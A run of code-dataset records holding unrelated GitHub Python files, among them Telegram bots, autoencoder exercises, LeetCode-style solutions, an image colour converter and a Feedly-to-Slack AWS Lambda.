quiz_1(message: types.Message):\n markup = InlineKeyboardMarkup()\n button_call_1 = InlineKeyboardButton(\n \"NEXT\",\n callback_data='button_call_1',\n )\n markup.add(button_call_1)\n\n question = 'Who is Martin Luther King?'\n answers = [\n 'The president', 'shooter', 'Preacher', 'Scientist'\n ]\n await bot.send_poll(\n chat_id=message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"Сам думай\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\n@dp.callback_query_handler(lambda call: call.data == \"button_call_1\")\nasync def quiz_2(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_2 = InlineKeyboardButton(\n \"NEXT\",\n callback_data='button_call_2',\n )\n markup.add(button_call_2)\n\n question = 'What the SpaceX?'\n answers = [\n \"First Variant\",\n \"Putin\",\n \"Store\",\n \"Griffin\",\n \"SpaceXsenomorphics\",\n \"Space Exploration Technologies Corporation\",\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=5,\n explanation=\"Сам думай\",\n )\n\n\n@dp.message_handler(commands=['mem'])\nasync def mem_1(message: types.Message):\n photo = open(\"Media/mem.jpg\", 'rb')\n await bot.send_photo(chat_id=message.chat.id, photo=photo)\n\n\n@dp.message_handler()\nasync def echo(message: types.Message):\n await bot.send_message(message.from_user.id, message.text)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n executor.start_polling(dp, skip_updates=True)\n\n# if __name__ == \"__main__\":\n# executor.start_polling(dp, skip_updates=True)\n","repo_name":"Manty-S-Djusaem/HWWWW","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35606969070","text":"##########################\n### Proposed solutions ###\n##########################\n\n##################\n### Exercise 1 ###\n##################\n\nmrna_input = keras.layers.Input(shape=(input_size,), name=\"input\")\nhidden = keras.layers.Dense(embedding_size, activation=\"sigmoid\", kernel_regularizer=keras.regularizers.l1(.001), name=\"hidden\")(mrna_input)\noutput = keras.layers.Dense(input_size, activation=\"sigmoid\", kernel_regularizer=keras.regularizers.l1(.001), name=\"reconstruction\")(hidden)\nl1_ae = tf.keras.Model(mrna_input, output, name=\"L1-regularized autoencoder\")\n\nl1_ae.compile(optimizer=tf.optimizers.Adam(), loss=tf.losses.mean_squared_error)\nl1_ae.summary()\n\nl1_ae.fit(\n x=x_train,\n y=x_train,\n validation_data=[x_test, x_test],\n epochs=1000,\n callbacks=[keras.callbacks.EarlyStopping(\n monitor=\"val_loss\",\n patience=3\n )]\n)\n\npd.DataFrame(l1_ae.history.history).plot()\nplt.ylim(0,2)\n\nsns.distplot(l1_ae.layers[1].get_weights()[0].flatten(), kde=True)\nplt.xlabel(r\"$\\|w\\|$\")\n\n# this shows the distribution of weights to have a marked spike at 0, creating a sparser autoencoder.\n\n\n##################\n### Exercise 2 ###\n##################\nmrna_input = tf.keras.layers.Input(shape=(input_size,), name=\"input\")\nimage_noisy = tf.keras.layers.GaussianNoise(stddev=noise_factor, name=\"noisy\")(mrna_input)\nhidden = tf.keras.layers.Dense(intermediate_size, activation=\"sigmoid\", name=\"hidden\")(image_noisy)\noutput = tf.keras.layers.Dense(input_size, activation=\"sigmoid\", name=\"reconstruction\")(hidden)\ndae = tf.keras.Model(mrna_input, output)\n\ndae.compile(optimizer=tf.optimizers.Adam(), loss=tf.losses.mean_squared_error)\n\n\n##################\n### Exercise 3 ###\n##################\n\n# Define the sampling function for the reparametrization trick\ndef sample(arg):\n z_mean, z_log_var = arg\n eps = tf.random.normal(shape=(z_mean.shape[1],))\n return z_mean + tf.multiply(tf.exp(z_log_var * 0.5), eps)\n\n# Define the layers\nmrna_input = tf.keras.layers.Input(shape=(input_size,), name=\"input\")\nh = tf.keras.layers.Dense(intermediate_size, activation=\"relu\", name=\"hidden\")(mrna_input)\n\n# For the latent space, we learn the mean, and logvar\nz_mean = tf.keras.layers.Dense(intermediate_size, activation=\"sigmoid\", name=\"z_mean\")(h)\nz_log_var = tf.keras.layers.Dense(intermediate_size, name=\"z_log_var\")(h)\n\n# The latent factors are then obtained by sampling\nz = tf.keras.layers.Lambda(sample, output_shape=(intermediate_size,), name=\"sample\")([z_mean, z_log_var])\n\n# The output layer is the same\noutput = tf.keras.layers.Dense(input_size, activation=\"sigmoid\", name=\"reconstruction\")(z)\nvae = tf.keras.Model(mrna_input, output)\n\n\n# We'll need to define the KL loss and add it to the vae\nkl_loss = -0.5 * tf.reduce_sum(\n 1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var),\n axis=-1,\n)\nvae_loss = tf.reduce_mean(kl_loss)\n\n# This adds the loss to the VAE\nvae.add_loss(vae_loss)\n\n# And we add the MSE loss when compiling\nvae.compile(optimizer=tf.optimizers.Adam(), loss=tf.losses.mean_squared_error)\n\n###################\n### Exercise 3A ###\n###################\n\ndeterministic_encoder = tf.keras.Model(mrna_input, z_mean)\n\n","repo_name":"RaikOtto/CompCancer","sub_path":"Session_4_autoencoders/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21583181416","text":"from onnxruntime import GraphOptimizationLevel, InferenceSession, SessionOptions\nfrom transformers.utils import logging\nimport os\n\nlogger = logging.get_logger(__name__)\n\n\ndef _create_quantized_graph(quantizer, model, graph_path, feature):\n logger.info(f\"Creating quantized graph from {graph_path.as_posix()}\")\n quantizer.fit(model.config.name_or_path, output_dir=str(graph_path.parent.as_posix()),\n feature=feature)\n\n\ndef _warmup_onnx_graph(self, n=10):\n for _ in range(n):\n self.__call__(*self.example.values())\n\n\ndef _forward_onnx(onnx_model, inputs, return_tensors=False):\n inputs_onnx = {k: v.cpu().detach().numpy() for k, v in inputs.items()}\n predictions = onnx_model.run(None, inputs_onnx)\n return predictions\n\n\ndef _export_onnx_graph(quantizer, model, graph_path, feature):\n # if graph exists, but we are here then it means something went wrong in previous load\n # so delete old graph\n if graph_path.exists():\n graph_path.unlink()\n\n # create parent dir\n if not graph_path.parent.exists():\n os.makedirs(graph_path.parent.as_posix())\n\n logger.info(f\"Saving onnx graph at {graph_path.as_posix()}\")\n\n quantizer.export(model.config.name_or_path, output_path=graph_path,\n feature=feature)\n\n\ndef create_model_for_providers(model_path: str) -> InferenceSession:\n logger.info(f\"Creating model for providers: {model_path}\")\n # Few properties that might have an impact on performances (provided by MS)\n options = SessionOptions()\n options.intra_op_num_threads = 1\n options.graph_optimization_level = GraphOptimizationLevel.ORT_ENABLE_ALL\n\n # Load the model as a graph and prepare the CPU backend\n session = InferenceSession(str(model_path), options)\n session.disable_fallback()\n\n return session\n","repo_name":"AlekseyKorshuk/optimum-transformers","sub_path":"optimum_transformers/pipelines/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"31715198118","text":"import sys\nprint(sys.path)\n\nfrom PIL import Image, ImageDraw\n\ndef main():\n #ask the user for an image file they would like to change the colors of\n image_file = (\"\")\n image_file = input(\"what is the chart, or image you would like to upload?\")\n\n #print a list of different types of color blindness to cutomize to\n print()\n print(\"What is your type of color blindness:\")\n print(\"1. deuteranomaly \")\n print(\"2. protanopia \")\n print(\"3. tritanopia \")\n print(\"4. complete color blindness \")\n \n #ask the user for the type of colorblindness\n value_scale = input(\"Which type of color value scale would you like to convert to?\")\n\n #assign a varible to function to open, display, get the pixels, find the width and height, and create a new image for the image the user input\n user_image = open_image(image_file)\n show_image(user_image)\n user_pixels = get_pixels(user_image)\n (width, height) = user_image.size\n new_color_image = new_image(user_image)\n \n # create if statements to lanch the correct function depending on the user input\n if value_scale == \"1\":\n deuteranomaly_colors(user_image, user_pixels, new_color_image, width, height)\n if value_scale == \"2\":\n protanopia_colors(user_image, user_pixels, new_color_image, width, height)\n if value_scale == \"3\":\n tritanopia_colors(user_image, user_pixels, new_color_image, width, height)\n if value_scale == \"4\":\n complete_color_blindness(user_image)\n else: \n print(\"I'm sorry, that is not a valid option\")\n\n#create a function that will open and read and return the file given by the user\ndef open_image(image_file):\n color_image = Image.open(image_file)\n return color_image\n\n#display the original un edited image file to the user\ndef show_image(user_image):\n user_image.show()\n\n#create a new image for the new color values to be added to \ndef new_image(user_image):\n output_image = Image.new(\"RGB\", user_image.size)\n return output_image\n\n#get the pixels from the image file given by the user\ndef get_pixels(user_image):\n\n pixels_image = user_image.load()\n return pixels_image\n\ndef deuteranomaly_colors(user_image, user_pixels, new_color_image, width, height):\n \"\"\" Unable to percieve green light. Deuteranomaly is the most common type of color blindness. \n it is also known as red/green color blindness. It makes red look brownish/yellowish. \n It makes yellow and green look beige. and it makes it difficult to tell blue and violet apart. \n this function will determine any pixels within the file that have colors that are hard\n for people with Deuteranomaly to tell apart and change them to a color they \n can easily tell apart. Don't use red/green/brown/orange together. \"\"\"\n \n def distance2(color1, color2):\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n return (r1 - r2) ** 2 + (g1 - g2) ** 2 + (b1 - b2) ** 2\n\n color_to_change = (255, 0, 0)\n \n threshold = 230\n\n # Create output image\n draw = ImageDraw.Draw(new_color_image)\n\n # Generate image\n for x in range(width):\n for y in range(height):\n r, g, b = user_pixels[x, y]\n if distance2(color_to_change, user_pixels[x, y]) < threshold ** 2:\n r = int(r * 1.50)\n g = int(g * .25)\n b = int(b * .25)\n draw.point((x, y), (r, g, b))\n \n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\ndef protanopia_colors(user_image, user_pixels, new_color_image, width, height):\n \"\"\" it is also known as red/green color blindness. Protanopia happens\n when there are no working red cones, making it impossible\n to see the color red. orange, yellow and green look yellow. this function will \n determine any pixels within the file that have colors that are hard\n for people with protanopia to tell apart and change them to a color they \n can easily tell apart.\"\"\"\n\n def distance2(color1, color2):\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n return (r1 - r2) ** 2 + (g1 - g2) ** 2 + (b1 - b2) ** 2\n\n color_to_change = (255, 0, 0)\n threshold = 230\n\n # Create output image\n draw = ImageDraw.Draw(new_color_image)\n\n # Generate image\n for x in range(width):\n for y in range(height):\n r, g, b = user_pixels[x, y]\n if distance2(color_to_change, user_pixels[x, y]) < threshold ** 2:\n r = int(r * .50)\n g = int(g * .50)\n b = int(b * 1.25)\n draw.point((x, y), (r, g, b))\n\n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\ndef tritanopia_colors(user_image, user_pixels, new_color_image, width, height):\n \"\"\"this is also known as blue/yellow color blindness. it is the 2nd most common\n type of colorblindness. there are no blue cone cells. blue looks green\n yellow looks light gray or violet \"\"\"\n\n def distance2(color1, color2):\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n return (r1 - r2) ** 2 + (g1 - g2) ** 2 + (b1 - b2) ** 2\n\n color_to_change = (0, 255, 0)\n threshold = 230\n\n # Create output image\n draw = ImageDraw.Draw(new_color_image)\n\n # Generate image\n for x in range(width):\n for y in range(height):\n r, g, b = user_pixels[x, y]\n if distance2(color_to_change, user_pixels[x, y]) < threshold ** 2:\n r = int(r * 1.00)\n g = int(g * .25)\n b = int(b * 1.50)\n\n \n draw.point((x, y), (r, g, b))\n\n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\ndef complete_color_blindness(user_image):\n \"\"\"this is the most rare color blindness someone can have. you have no \n color perseption at all. making the world gray, white, and black. it is \n very hard to tell color apart from each other. this function will take each color\n and put it into a gray scale version of that color making it easier for people\n with complete colorblindness to tell values apart\"\"\"\n\n new_color_image = user_image.convert(\"L\")\n\n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\n#Color combinations to avoid for people with color blindness include:\n#Red & green\n#Green & brown\n#Green & blue\n#Blue & gray\n#Blue & purple\n#Green & gray\n#Green & black\nif __name__ == \"__main__\": \n main()","repo_name":"elisabeth-billman/ChromaClarity","sub_path":"color_converter.py","file_name":"color_converter.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27473043910","text":"from aiogram import types\nfrom aiogram.dispatcher.filters import Command\n\nfrom data.config import CHAT_ID\nfrom filters import Is_Admin\nfrom loader import dp, bot\nfrom utils.db_utils.db_functions import get_user_id, get_user_xp, terminate_user\nfrom utils.inline_keyboards import admin_panel, get_all_users_keyboard, get_user_keyboard, back_to_user_menu, \\\n back_to_users_keyboard\n\n\n@dp.message_handler(Command(\"admin_panel\"), Is_Admin(), chat_type=[types.ChatType.PRIVATE])\nasync def get_admin_panel(message: types.Message):\n await message.answer(\"Вы вошли в админ-панель.\", reply_markup=admin_panel)\n\n\n@dp.callback_query_handler(text=\"get_users\", chat_type=[types.ChatType.PRIVATE])\nasync def get_all_users_from_admin_panel(callback: types.CallbackQuery):\n await callback.message.edit_text(\"Все пользователи группы:\")\n await callback.message.edit_reply_markup(reply_markup=await get_all_users_keyboard())\n\n\n@dp.callback_query_handler(text_contains=\"get_user\", chat_type=[types.ChatType.PRIVATE])\nasync def get_user_from_admin_panel(callback: types.CallbackQuery):\n user_data = callback.data.split(\":\")\n user_name = user_data[1].strip()\n\n await callback.message.edit_text(f\"Пользователь {user_name}:\")\n await callback.message.edit_reply_markup(reply_markup=await get_user_keyboard(user_name))\n\n\n@dp.callback_query_handler(text_contains=\"get_xp\", chat_type=[types.ChatType.PRIVATE])\nasync def get_xp_from_user(callback: types.CallbackQuery):\n user_data = callback.data.split(\":\")\n user_name = user_data[1].strip()\n user_id = await get_user_id(user_name)\n user_xp = await get_user_xp(user_id)\n\n await callback.message.edit_text(f\"Опыт пользователя {user_name}: {user_xp}xp.\")\n await callback.message.edit_reply_markup(reply_markup=await back_to_user_menu(user_name))\n\n\n@dp.callback_query_handler(text_contains=\"terminate_user\", chat_type=[types.ChatType.PRIVATE])\nasync def terminate_user_from_group(callback: types.CallbackQuery):\n user_data = callback.data.split(\":\")\n user_name = user_data[1].strip()\n user_id = await get_user_id(user_name)\n\n await callback.message.edit_text(f\"Пользователь {user_name} был удалён из базы данных и заблокирован \"\n f\"в группе.\")\n await callback.message.edit_reply_markup(reply_markup=back_to_users_keyboard)\n\n await terminate_user(user_id)\n await bot.ban_chat_member(CHAT_ID, user_id)\n\n\n@dp.callback_query_handler(text_contains=\"back_to_admin_panel\", chat_type=[types.ChatType.PRIVATE])\nasync def back_to_admin_panel(callback: types.CallbackQuery):\n await callback.message.edit_text(\"Админ панель.\")\n await callback.message.edit_reply_markup(admin_panel)\n\n\n@dp.callback_query_handler(text_contains=\"admin_panel_exit\", chat_type=[types.ChatType.PRIVATE])\nasync def exit_from_admin_panel(callback: types.CallbackQuery):\n await callback.message.delete()\n\n\n@dp.callback_query_handler(text=\"back_to_all_users\", chat_type=[types.ChatType.PRIVATE])\nasync def back_to_all_users_panel(callback: types.CallbackQuery):\n await get_all_users_from_admin_panel(callback)\n\n\n@dp.callback_query_handler(text=\"back_to_user\", chat_type=[types.ChatType.PRIVATE])\nasync def back_to_user_panel(callback: types.CallbackQuery):\n await get_user_from_admin_panel(callback)","repo_name":"Hallteon/moderator-telegram-bot","sub_path":"handlers/admins/admin_panel_handlers.py","file_name":"admin_panel_handlers.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2071581143","text":"#converting num to string is trivial, requires extra space\n#find left most and right most number (not character) and compare them\n#but how to do it math way? see the smart method below\n\nclass Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0 or x%10==0 and x>0:\n return False\n \n r = 1\n while x / r >= 10:\n r *= 10\n # r is the highest digit of x (10 base)\n # for example, x=121 -> r = 100\n\n while r > 1:\n \n #shorten x by triming 1 digit from left\n left, x =divmod(x, r)\n #shorten x by triming 1 digit from right\n x, right = divmod(x, 10)\n \n #compare left & right\n if left != right:\n return False\n #because x has been shorted by 2 digits in each loop\n #so in next loop r = r/100\n r //= 100\n\n return True\n","repo_name":"mcfair/Algo","sub_path":"Math/009. Palindrome Number.py","file_name":"009. Palindrome Number.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28319584221","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\nn, m = map(int, input().split())\r\nboard = [list(input().strip()) for _ in range(n)]\r\n\r\n# 2개의 구슬 좌표 x,y를 4차원으로 배열에 선언하고 False로 초기화 이 후 방문여부 체크 하고 방문 안했다면 queuq 에 넣고 True로 체크\r\nvisited = [[[[False]*m for _ in range(n)] for _ in range(m)] for _ in range(n)]\r\ndx = (-1, 1, 0, 0) # (왼쪽 오른쪽 위 아래) x 좌표 의미\r\ndy = (0, 0, -1, 1) # (왼쪽 오른쪽 위 아래) y 좌표 의미\r\nq = deque()\r\n\r\n\r\ndef init():\r\n rx, ry, bx, by = [0] *4 # 빨간 파란 공의 위치 초기화\r\n for i in range(n):\r\n for j in range(m):\r\n if board[i][j] == 'R':\r\n rx, ry = i,j\r\n if board[i][j] == 'B':\r\n bx, by = i,j\r\n\r\n print('빨간 공의 위치 :', (rx, ry), '파란 공의 위치 :', (bx, by))\r\n q.append((rx, ry, bx, by, 1)) # 1은 depth\r\n visited[rx][ry][bx][by] = True\r\n\r\n\r\ndef move(x, y, dx, dy):\r\n cnt = 0 # 이동한 칸 수\r\n while board[x+dx][y+dy] !='#' and board[x][y] !='0':\r\n x += dx\r\n y += dy\r\n cnt +=1\r\n\r\n return x,y, cnt\r\n\r\n\r\ndef bfs():\r\n init()\r\n while q:\r\n rx, ry, bx, by, depth =q.popleft()\r\n if depth > 10: # 공이 10번 이상 이동하면 종료\r\n break\r\n for i in range(len(dx)):\r\n Nrx, Nry, rcnt = move(rx, ry, dx[i], dx[i]) # 빨간 공 움직임\r\n Nbx, Nby, bcnt = move(bx, by, dx[i], dx[i]) # 파란 공 움직임\r\n\r\n print('depth :', depth, \"방향 :\", dx[i],dy[i], '빨간 공 위치:', Nrx, Nry, \"파란 공 :\", Nbx, Nby )\r\n\r\n if board[Nrx][Nry] == '0': # 빨간 공이 구멍에 떨어지면\r\n print('depth =', depth)\r\n return\r\n if board[Nbx][Nby] == '0': # 파란 공이 구멍에 떨어지면\r\n continue\r\n if Nrx == Nbx and Nry == Nby: # 빨간 공과 파란 공의 위치가 같다면\r\n if rcnt > bcnt: # 이동 거리가 더 많은 쪽이 뒤로 한칸 간다.\r\n Nrx -= dx[i]\r\n Nry -= dy[i]\r\n else:\r\n Nbx -= dx[i]\r\n Nby -= dy[i]\r\n\r\n # 방문 여부 확인\r\n if not visited[Nrx][Nry][Nbx][Nby]:\r\n visited[Nrx][Nry][Nbx][Nby] = True\r\n q.append((Nrx, Nry, Nbx, Nby, depth+1))\r\n\r\n print(-1) # 실패\r\n\r\nbfs()","repo_name":"daehanchoi-dev/BOJ-BAEKJOONALGORITHM","sub_path":"13460.py","file_name":"13460.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41299993712","text":"def canFinish(numCourses, prerequisites):\n from collections import defaultdict\n \n if len(prerequisites)==0:\n return True\n \n graph = defaultdict(set)\n \n def cycleUtil(vertex,visited,stack):\n visited.add(vertex)\n stack.add(vertex)\n for adj in graph[vertex]:\n if adj not in visited:\n if cycleUtil(adj,visited,stack):\n return True\n elif adj in stack:\n return True\n stack.remove(vertex)\n return False\n \n \n def cycle():\n visited = set()\n stack = set()\n for vertex in range(numCourses):\n if vertex not in visited:\n if cycleUtil(vertex,visited,stack):\n return True\n return False\n \n \n for i in range(numCourses):\n graph[i]\n \n for course, req in prerequisites:\n graph[course].add(req)\n \n return not cycle()\n\nprint(canFinish(4,[[2,0],[1,0],[3,1],[3,2],[1,3]]))","repo_name":"amanptl/LeetCode","sub_path":"Medium/Course Schedule.py","file_name":"Course Schedule.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3813592867","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import *\n\n\ndef index(request):\n context = {'questions_list': Question.objects.all()}\n return render(request, 'polls/index.html', context)\n\n\ndef detail(request, question_id):\n question = None\n\n try:\n question = Question.objects.get(pk=question_id)\n except:\n print(\"Question with id \" + question_id + \" was not found\")\n\n context = {'question': question}\n\n return render(request, 'polls/detail.html', context)","repo_name":"AlessandroFC15/PollsApp","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39199768039","text":"import argparse\nimport requests\nimport bs4\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, nargs='+')\n \n args = parser.parse_args()\n ips = args.ip\n \n return ips\n \nips = parse()\nidx = 1\nprint(\"\\n\")\nfor ip in ips:\n url = 'http://ip2nation.com/'\n res = requests.post(url, data={'ip' : ip})\n \n res = bs4.BeautifulSoup(res.text, 'html.parser')\n res = res.find('acronym').text\n \n print(\"[\"+str(idx)+\"] \"+ip+\" ==> \"+res)\n idx += 1\n\t\n\t#python ip.py --ip [ip]","repo_name":"nostaljic/ip2nation","sub_path":"ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8585687839","text":"from django.urls import path\nfrom .views import RoleViewSet,TitleViewSet,EventViewSet,ReviewCommentViewSet,AuthorView,FetchAllBlog,FetchRoleWiseAccount,FetchSortedEvent,PageReadLog\nfrom rest_framework_nested import routers\nrouter = routers.DefaultRouter()\n\nrouter.register('titles',viewset=TitleViewSet,basename='titles')\ntitle_router = routers.NestedDefaultRouter(router,'titles',lookup='title')\ntitle_router.register('events',viewset=EventViewSet,basename='title-events')\nrouter.register('events',viewset=EventViewSet,basename='events')\nevent_router = routers.NestedDefaultRouter(router,'events',lookup='event')\nevent_router.register('comments',viewset=ReviewCommentViewSet,basename='event-comments')\nrouter.register('roles',viewset=RoleViewSet,basename='roles')\n\nurlpatterns = [\n path('author-interface/', AuthorView.as_view(),name='admin'),\n path('fetch-blogs/',FetchAllBlog.as_view(),name='allblog'),\n path('fetch-role-wise-account/',FetchRoleWiseAccount.as_view(),name=\"fetchrolewiseaccount\"),\n path('fetch-sorted-event/',FetchSortedEvent.as_view(),name=\"fetchsortedevent\"),\n path('page-read-logs/',PageReadLog.as_view(),name=\"pagereadlogs\")\n \n] + router.urls + title_router.urls + event_router.urls\n\n\n\n","repo_name":"RushikeshPtl/anveshak-inhouse","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2579030709","text":"num1= input(\"Entre first Number : \")\r\nnum2= input(\"Entre second Number : \")\r\nnum3= input(\"Entre third Number : \")\r\nnum4= input(\"Entre fourth Number : \")\r\n\r\nnum1= (int)(num1)\r\nnum2= (int)(num2)\r\nnum3= (int)(num3)\r\nnum4= (int)(num4)\r\n\r\ngreatest=0\r\n\r\nif(num1>num2 and num1>num3 and num1>num4):\r\n greatest=num1\r\nelif(num2>num1 and num2>num3 and num2>num4):\r\n greatest=num2\r\nelif(num3>num1 and num3>num2 and num3>num4):\r\n greatest=num3\r\nelif(num4>num1 and num4>num3 and num4>num3):\r\n greatest=num4\r\n\r\n\r\nprint(\"The greatest number is : \",str(greatest))","repo_name":"Unseen-Elder/Python_practice","sub_path":"f6/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8251191649","text":"# -*- coding: utf-8 -*-\n\nimport simple_draw as sd\n\nsd.resolution = 1800, 900\n\n\n# Шаг 1: Реализовать падение снежинки через класс. Внести в методы:\n# - создание снежинки с нужными параметрами\n# - отработку изменений координат\n# - отрисовку\n\n\nclass Snowflake:\n\n def __init__(self, name=None):\n self.name = name\n self.x = sd.random_number(100, 1100)\n self.y = sd.random_number(700, 800)\n self.length = sd.random_number(5, 30)\n\n def __str__(self):\n return self\n\n def move(self):\n self.x += sd.random_number(-5, 5)\n self.y -= sd.random_number(5, 20)\n\n def clear_previous_picture(self):\n point = sd.get_point(self.x, self.y)\n sd.snowflake(center=point, length=self.length, color=sd.background_color)\n\n def draw(self):\n point = sd.get_point(self.x, self.y)\n sd.snowflake(center=point, length=self.length)\n\n def can_fall(self):\n return self.y > 10\n\n\nsnowflake_list = []\n\n\ndef get_flakes(count):\n global snowflake_list\n for name in range(count):\n snowflake_list.append(Snowflake())\n return snowflake_list\n\n\ndef get_fallen_flakes():\n for_remove = []\n count = 0\n for i in snowflake_list:\n if i.can_fall() is False:\n count += 1\n for_remove.append(i)\n return count, for_remove\n\n\ndef remove(for_remove_list):\n global snowflake_list\n for i in for_remove_list:\n snowflake_list.remove(i)\n return snowflake_list\n\n\n# flake = Snowflake()\n# while True:\n# flake.clear_previous_picture()\n# flake.move()\n# flake.draw()\n#\n# if not flake.can_fall():\n# break\n# sd.sleep(0.1)\n# if sd.user_want_exit():\n# break\n\n# # шаг 2: создать снегопад - список объектов Снежинка в отдельном списке, обработку примерно так:\n\nflakes = get_flakes(10) # создать список снежинок\n\nwhile True:\n for flake in flakes:\n flake.clear_previous_picture()\n flake.move()\n flake.draw()\n fallen_flakes = get_fallen_flakes() # подчитать сколько снежинок уже упало\n if fallen_flakes:\n get_flakes(count=fallen_flakes[0]) # добавить еще сверху\n remove(for_remove_list=fallen_flakes[1])\n sd.sleep(0.1)\n if sd.user_want_exit():\n break\n\nsd.pause()\n\n# зачёт!\n","repo_name":"AlexanderKornev/Public","sub_path":"lesson_007/01_snowfall.py","file_name":"01_snowfall.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24679395523","text":"import logging.config\nimport traceback\nimport os\nimport json\nimport base64\nimport boto3\nimport requests\n\ndef decryptionUrl(encrypted_environ):\n decrypted_environ = boto3.client('kms').decrypt(CiphertextBlob=base64.b64decode(encrypted_environ))['Plaintext']\n return 'https:{}'.format(\n decrypted_environ.decode('utf-8')\n )\n\n# get environ\nerror_slack_url = decryptionUrl(os.environ.get('ERROR_SLACK_URL', None))\nerror_slack_channel = os.environ.get('ERROR_SLACK_CHANNEL', None)\nlog_level = os.environ.get('LOG_LEVEL', 'ERROR')\n\n# debug settings\ndef logger_level(level):\n if level == 'CRITICAL':\n return 50\n elif level == 'ERROR':\n return 40\n elif level == 'WARNING':\n return 30\n elif level == 'INFO':\n return 20\n elif level == 'DEBUG':\n return 10\n else:\n return 0\n\nlogger = logging.getLogger()\nlogger.setLevel(logger_level(log_level))\n\ndef lambda_handler(event, context):\n try:\n # get enviton\n slack_url = decryptionUrl(os.environ.get('SLACK_URL', None))\n slack_channel = os.environ.get('SLACK_CHANNEL', None)\n\n # data to slack\n if not('Records' in event):\n return event\n\n records = event['Records']\n for record in records:\n\n if not('dynamodb' in record):\n continue\n\n if not('NewImage' in record['dynamodb']):\n continue\n\n feed = record['dynamodb']['NewImage']\n art_title = feed['art_title']['S']\n art_url = feed['art_url']['S']\n author_name = feed['author_name']['S']\n author_url = feed['author_url']['S']\n\n # If a feed doesn't have any image, the Feedly official logo will be set.\n # This script may catch an error if fails to get an image file.\n if 'art_image_url' in feed:\n art_image_url = feed['art_image_url']['S']\n else:\n art_image_url = 'https://s5.feedly.com/images/feedly-512.png'\n\n if 'written_by' in feed:\n written_by = ' by ' + feed['written_by']['S']\n else:\n written_by = ' '\n\n if 'summary' in feed:\n summary = feed['summary']['S'][0:100] + '....'\n # Settng half-width space for script not to stop.\n else:\n summary = ' '\n\n # this is the right way to write with 'blocks' in Slack API\n requests.post(\n slack_url,\n json.dumps(\n {\n 'blocks': [\n \t {\n 'type': 'section',\n 'text': {\n 'type': 'mrkdwn',\n 'text': '*<{art_url}|{art_title}>*\\n<{author_url}|{author_name}>{written_by}\\n{summary}'.format(\n art_url = art_url,\n art_title = art_title,\n author_url = author_url,\n author_name = author_name,\n written_by = written_by,\n summary = summary\n )\n },\n 'accessory': {\n 'type': 'image',\n 'image_url': art_image_url,\n 'alt_text': ' '\n }\n }\n ]\n }\n )\n )\n\n except:\n logger.error(traceback.format_exc())\n requests.post(\n error_slack_url,\n json.dumps(\n {\n 'blocks': [\n {\n 'type': 'section',\n 'text': {\n 'type': 'plain_text',\n 'text': 'dynamo_to_slack error\\n{message}'.format(\n message=traceback.format_exc()\n )\n }\n }\n ]\n }\n )\n )\n\n finally:\n return event","repo_name":"roodolv/feedly2slack_lambda","sub_path":"db2slack/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23472793369","text":"\"\"\"\nHW03\nZADÁNÍ:\nVytvoøte program numbers.py pro úlohu HW03, který ze standardního vstupu pøeète øádku, \nkterá obsahuje bud èíslo v desítkové soustavì nebo èíslo zapsané slovy bez 